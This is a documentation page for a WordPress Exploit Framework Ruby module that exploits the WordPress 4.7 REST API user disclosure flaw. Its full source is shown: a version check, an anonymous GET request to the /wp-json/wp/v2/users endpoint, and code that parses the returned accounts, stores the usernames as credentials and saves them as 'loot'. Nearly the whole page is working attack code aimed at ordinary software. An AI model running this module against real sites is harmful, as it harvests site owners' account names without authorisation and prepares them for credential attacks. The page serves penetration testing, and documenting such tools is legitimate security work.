class Wpxf::Auxiliary::Wp47UserInfoDisclosure

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb, line 9
def initialize
  super

  update_info(
    name: 'WordPress 4.7 - User Information Disclosure via REST API',
    desc: %(
      The new WordPress REST API allows anonymous access. One of the functions that
      it provides, is that anyone can list the users on a WordPress website without
      registering or having an account.
    ),
    author: [
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '8715'],
      ['URL', 'https://github.com/WordPress/WordPress/commit/daf358983cc1ce0c77bf6d2de2ebbb43df2add60']
    ],
    date: 'Jan 11 2017'
  )
end

Public Instance Methods

call_users_api() click to toggle source
# File lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb, line 41
def call_users_api
  res = execute_get_request(url: users_api_url)

  if res.nil?
    emit_error 'No response from the target'
    return nil
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return nil
  end

  res
end
check() click to toggle source
# File lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb, line 30
def check
  version = wordpress_version
  return :unknown if version.nil?
  return :vulnerable if version == Gem::Version.new('4.7')
  :safe
end
output_user_list(api_output) click to toggle source
# File lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb, line 57
def output_user_list(api_output)
  headers = [{ id: 'ID', username: 'Username', name: 'Name' }]
  rows = []

  users = JSON.parse(api_output)
  users.each do |user|
    store_credentials user['slug']
    rows.push(id: user['id'], username: user['slug'], name: user['name'])
  end

  rows.sort_by! { |row| row[:id] }
  emit_table headers.concat(rows)
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb, line 71
def run
  return false unless super

  emit_info 'Calling the users API...'
  res = call_users_api
  return false if res.nil?

  emit_info 'Parsing result...', true
  output_user_list res.body

  loot = export_and_log_loot res.body, 'List of usernames from the REST API', 'user list', '.json'
  emit_success "Saved export to #{loot.path}"

  true
end
users_api_url() click to toggle source
# File lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb, line 37
def users_api_url
  normalize_uri(full_uri, 'wp-json', 'wp', 'v2', 'users')
end